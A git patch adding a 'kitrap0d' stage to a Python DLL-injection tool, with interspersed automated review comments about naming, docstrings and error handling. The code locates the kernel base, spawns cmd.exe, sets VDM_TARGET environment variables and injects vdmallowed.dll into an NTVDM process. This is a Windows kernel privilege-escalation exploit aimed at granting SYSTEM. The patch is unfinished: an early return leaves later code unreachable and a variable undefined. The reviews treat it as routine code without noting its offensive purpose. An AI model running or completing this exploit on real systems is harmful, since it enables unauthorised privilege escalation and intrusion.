From ca12de0bae1f2047be2d0e34a1627e69eec0b3a7 Mon Sep 17 00:00:00 2001
From: PsychoMario
Date: Wed, 30 May 2012 23:31:44 +0100
Subject: [PATCH] Adding in kitrap0d exe stage

---
 dllinject.py | 178 ++++++++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 177 insertions(+), 1 deletion(-)

diff --git a/dllinject.py b/dllinject.py
index 472d895..fb06e54 100644
--- a/dllinject.py
+++ b/dllinject.py
@@ -2,6 +2,7 @@
 import ctypes.wintypes as wintypes
 import platform
 import binascii
+import os
 wintypes.LPTSTR = ctypes.POINTER(ctypes.c_char)
 wintypes.LPBYTE = ctypes.POINTER(ctypes.c_ubyte)
@@ -60,6 +61,90 @@ class __PROCESS_INFORMATION(ctypes.Structure):
 ("dwProcessId", wintypes.DWORD),
 ("dwThreadId", wintypes.DWORD),]
 wintypes.PROCESS_INFORMATION = __PROCESS_INFORMATION
+class __SYSTEM_MODULE_INFORMATION(ctypes.Structure):
+ _fields_ = [("ModuleCount", wintypes.ULONG),
+ ("WhoCares", ctypes.c_void_p * 2),
+ ("BaseAddress", ctypes.c_void_p),
+ ("Size", wintypes.ULONG),
+ ("MoarStuff", wintypes.ULONG),
+ ("MoarMoar", wintypes.USHORT),
+ ("HeyThere", wintypes.USHORT),
+ ("Pwned", wintypes.USHORT),
+ ("W00t", wintypes.USHORT),
+ ("ImageName", ctypes.c_char * 256),]
+wintypes.SYSTEM_MODULE_INFORMATION = __SYSTEM_MODULE_INFORMATION
+class __IMAGE_DOS_HEADER(ctypes.Structure):
+ _fields_ = [("e_magic", wintypes.WORD),
+ ("e_cblp", wintypes.WORD),
+ ("e_cp", wintypes.WORD),
+ ("e_crlc", wintypes.WORD),
+ ("e_cparhdr", wintypes.WORD),
+ ("e_minalloc", wintypes.WORD),
+ ("e_maxalloc", wintypes.WORD),
+ ("e_ss", wintypes.WORD),
+ ("e_sp", wintypes.WORD),
+ ("e_csum", wintypes.WORD),
+ ("e_ip", wintypes.WORD),
+ ("e_cs", wintypes.WORD),
+ ("e_lfarlc", wintypes.WORD),
+ ("e_ovno", wintypes.WORD),
+ ("e_res", wintypes.WORD * 4),
+ ("e_oemid", wintypes.WORD),
+ ("e_oeminfo", wintypes.WORD),
+ ("e_res2", wintypes.WORD * 10),
+ ("e_lfanew", wintypes.LONG),]
+wintypes.IMAGE_DOS_HEADER = __IMAGE_DOS_HEADER
+class __IMAGE_FILE_HEADER(ctypes.Structure):
+ _fields_ = [("Machine", wintypes.WORD),
+ ("NumberOfSections", wintypes.WORD),
+ ("TimeDateStamp", wintypes.DWORD),
+ ("PointerToSymbolTable", wintypes.DWORD),
+ ("NumberOfSymbols", wintypes.DWORD),
+ ("SizeOfOptionalHeader", wintypes.WORD),
+ ("Characteristics", wintypes.WORD),]
+wintypes.IMAGE_FILE_HEADER = __IMAGE_FILE_HEADER
+class __IMAGE_DATA_DIRECTORY(ctypes.Structure):
+ _fields_ = [("VirtualAddress", wintypes.DWORD),
+ ("Size", wintypes.DWORD),]
+wintypes.IMAGE_DATA_DIRECTORY = __IMAGE_DATA_DIRECTORY
+class __IMAGE_OPTIONAL_HEADER(ctypes.Structure):
+ _fields_ = [("Magic", wintypes.WORD),
+ ("MajorLinkerVersion", wintypes.BYTE),
+ ("MinorLinkerVersion", wintypes.BYTE),
+ ("SizeOfCode", wintypes.DWORD),
+ ("SizeOfInitializedData", wintypes.DWORD),
+ ("SizeOfUninitializedData", wintypes.DWORD),
+ ("AddressOfEntryPoint", wintypes.DWORD),
+ ("BaseOfCode", wintypes.DWORD),
+ ("BaseOfData", wintypes.DWORD),
+ ("ImageBase", wintypes.DWORD),
+ ("SectionAlignment", wintypes.DWORD),
+ ("FileAlignment", wintypes.DWORD),
+ ("MajorOperatingSystemVersion", wintypes.WORD),
+ ("MinorOperatingSystemVersion", wintypes.WORD),
+ ("MajorImageVersion", wintypes.WORD),
+ ("MinorImageVersion", wintypes.WORD),
+ ("MajorSubsystemVersion", wintypes.WORD),
+ ("MinorSubsystemVersion", wintypes.WORD),
+ ("Win32VersionValue", wintypes.DWORD),
+ ("SizeOfImage", wintypes.DWORD),
+ ("SizeOfHeaders", wintypes.DWORD),
+ ("CheckSum", wintypes.DWORD),
+ ("Subsystem", wintypes.WORD),
+ ("DllCharacteristics", wintypes.WORD),
+ ("SizeOfStackReserve", wintypes.DWORD),
+ ("SizeOfStackCommit", wintypes.DWORD),
+ ("SizeOfHeapReserve", wintypes.DWORD),
+ ("SizeOfHeapCommit", wintypes.DWORD),
+ ("LoaderFlags", wintypes.DWORD),
+ ("NumberOfRvaAndSizes", wintypes.DWORD),
+ ("DataDirectory", wintypes.IMAGE_DATA_DIRECTORY * 16),]
+wintypes.IMAGE_OPTIONAL_HEADER = __IMAGE_OPTIONAL_HEADER
+class __IMAGE_NT_HEADER(ctypes.Structure):
+ _fields_ = [("Signature", wintypes.DWORD),
+ ("FileHeader", wintypes.IMAGE_FILE_HEADER),
+ ("OptionalHeader", wintypes.IMAGE_OPTIONAL_HEADER),]
+wintypes.IMAGE_NT_HEADER = __IMAGE_NT_HEADER
 class Process():
 """This class can be used for dll or shellcode injection.
@@ -79,7 +164,7 @@ class Process():
 self.terminate(code) This will terminate the process in use regardless of where it was started from. code is the exit code"""
-def __init__(self, pid=None, pe=None):
+def __init__(self, pid=None, pe=None, handle=None):
 self.kernel32 = ctypes.windll.kernel32
 self.PROCESS_ALL_ACCESS = (0x000F0000L|0x00100000L|0xFFF)
 self.SE_DEBUG_NAME = "SeDebugPrivilege"
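Review bot: `__SYSTEM_MODULE_INFORMATION` fills six of its slots with placeholder names (`WhoCares`, `MoarStuff`, `MoarMoar`, `HeyThere`, `Pwned`, `W00t`) and nothing records that they presumably exist only to keep `BaseAddress`, `Size` and `ImageName`, the three members `get_kernel_addr` actually reads, at the right offsets. Give them neutral names (`Reserved1`, `Reserved2`, ...) or at least put a comment above `_fields_` such as `# only BaseAddress, Size and ImageName are read; the other fields pad the entry to the native layout`. `__IMAGE_OPTIONAL_HEADER` also hard-codes the PE32 (32-bit) layout, with `ImageBase` as a DWORD and a `BaseOfData` member that a PE32+ image does not have; unless a platform check elsewhere in the file already restricts this module to 32-bit, a comment `# PE32 (32-bit) optional header layout only` above the class would stop the next reader from reusing it on a 64-bit image.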
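Review bot: The new `handle` parameter is undocumented: the class docstring lines kept as context above `__init__` describe `terminate`, but nothing in this hunk, or in the `elif handle:` branch added at hunk -112, says what `handle` must be or who owns it. Since `terminate` closes `self.handle` with `CloseHandle` (visible as context at hunk -263), a caller that passes its own handle gives up ownership of it; add a docstring line such as `handle: an already-open process handle; the Process takes ownership and closes it in terminate`. Note also that `elif handle:` treats a NULL (0) handle, the value `OpenProcess` returns on failure, as absent, so the constructor silently falls into the `else: return None` branch and leaves `self.handle` unset; testing `handle is not None` and raising on 0 would surface that failure where it happens. `__init__` continues past the end of this hunk.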
@@ -112,6 +197,8 @@ def __init__(self, pid=None, pe=None):
 ctypes.byref(process_information)
 )
 self.handle = process_information.hProcess
+ elif handle:
+ self.handle = handle
 else:
 return None
@@ -164,6 +251,7 @@ def inject(self, dllpath):
 #inject dllpath into our process and then executes it """
+ dllpath = os.path.abspath(dllpath)
 push = "\x68"
 dllpath = "\x00".join(list(dllpath))+"\x00\x00\x00" #convert to null padded unicode
@@ -263,3 +351,91 @@ def terminate(self, code=0):
 code
 )
 self.kernel32.CloseHandle(self.handle)
+
+
+def get_kernel_addr():
+ ntdll = ctypes.windll.ntdll
+ buffer_size = wintypes.ULONG(0)
+ ntdll.ZwQuerySystemInformation(11, 0, 0, ctypes.byref(buffer_size));
+
+ sysmod_info = ctypes.create_string_buffer(buffer_size.value)
+ ntdll.ZwQuerySystemInformation(11, ctypes.byref(sysmod_info), buffer_size.value, ctypes.byref(buffer_size));
+
+ mod_list = ctypes.cast(sysmod_info, ctypes.POINTER(wintypes.SYSTEM_MODULE_INFORMATION))
+ return (mod_list[0].BaseAddress, mod_list[0].ImageName.split('\\')[-1], mod_list[0].Size)
+
+def kitrap0d():
+ kernel32 = ctypes.windll.kernel32
+
+ startupinfo = wintypes.STARTUPINFO()
+ process_information = wintypes.PROCESS_INFORMATION()
+ startupinfo.dwFlags = 0x1
+ startupinfo.wShowWindow = 0x1
+ startupinfo.cb = ctypes.sizeof(startupinfo)
+ kernel32.CreateProcessA(
+ "C:\\WINDOWS\\system32\\cmd.exe",
+ "C:\\WINDOWS\\system32\\cmd.exe",
+ None,
+ None,
+ False,
+ 0x00000010,
+ None,
+ None,
+ ctypes.byref(startupinfo),
+ ctypes.byref(process_information)
+ )
+ givesys = process_information.dwProcessId
+
+ kernbase, kernimage, kernsize = get_kernel_addr()
+ kernhandle = kernel32.LoadLibraryA(kernimage)
+ xpsig = "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84"
+ dos_header = ctypes.cast(kernhandle, ctypes.POINTER(wintypes.IMAGE_DOS_HEADER))
+ nt_header = ctypes.cast(kernhandle + dos_header.contents.e_lfanew, ctypes.POINTER(wintypes.IMAGE_NT_HEADER))
+ optional_header = nt_header.contents.OptionalHeader
+ baseofcode = optional_header.BaseOfCode
+ sizeofcode = optional_header.SizeOfCode
+ #search between kernelhandle[baseofcode] - kernelhandle[baseofcode+sizeofcode] for xpsig
+ buf = ctypes.c_byte*kernsize
+ kernelarray = ctypes.cast(kernhandle, ctypes.POINTER(buf)).contents
+ fh=open("E:\\file.exe",'wb')
+ kernelarray = kernelarray[:]
+ kernelarray = [chr(abs(i)) for i in kernelarray]
+ return kernelarray
+ fh.close()
+ #for i in range(0,kernsize):
+ # chunk = ''.join([chr(abs(i)) for i in kernelarray[i:i+len(xpsig)]])
+ # if chunk == xpsig:
+ # continue
+ return i
+
+
+
+ kernel32.SetEnvironmentVariable("VDM_TARGET_PID",hex(givesys))
+ kernel32.SetEnvironmentVariable("VDM_TARGET_KRN",hex(kernbase))
+ kernel32.SetEnvironmentVariable("VDM_TARGET_OFF",hex(kernoff))
+
+ startupinfo = wintypes.STARTUPINFO()
+ process_information = wintypes.PROCESS_INFORMATION()
+ startupinfo.dwFlags = 0x1
+ startupinfo.wShowWindow = 0x0
+ startupinfo.cb = ctypes.sizeof(startupinfo)
+ kernel32.CreateProcessA(
+ "C:\\WINDOWS\\system32\\debug.exe",
+ None,
+ None,
+ None,
+ True,
+ 0x00000004,
+ None,
+ None,
+ ctypes.byref(startupinfo),
+ ctypes.byref(process_information)
+ )
+ ntvdm = kernel32.OpenProcess(
+ 0x43b,
+ False,
+ process_information.dwProcessId
+ )
+
+ ntvdminject = Process(handle=ntvdm)
+ ntvdminject.inject("vdmallowed.dll")
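Review bot: `get_kernel_addr` discards the NTSTATUS from both `ZwQuerySystemInformation` calls, so a failed query leaves `buffer_size` at 0 and `mod_list[0]` then reads structure fields beyond a zero-length buffer; check `buffer_size.value` after the sizing call, compare the second call's status with 0 (STATUS_SUCCESS), and raise an exception on either failure instead of returning garbage. In `kitrap0d`, `fh=open("E:\\file.exe",'wb')` is a hard-coded debug path whose handle is never written to or closed, because `return kernelarray` two lines later exits the function before `fh.close()` and leaves everything below it unreachable, including the commented-out loop and the later `kernoff` reference that is never bound anywhere in the hunk; drop the debug handle (or open it in a `with` block if it is needed) and remove the commented-out code rather than committing it. The two `CreateProcessA` calls and `OpenProcess` likewise ignore their return values, so a failed launch or open is not detected before the resulting process id or handle is used.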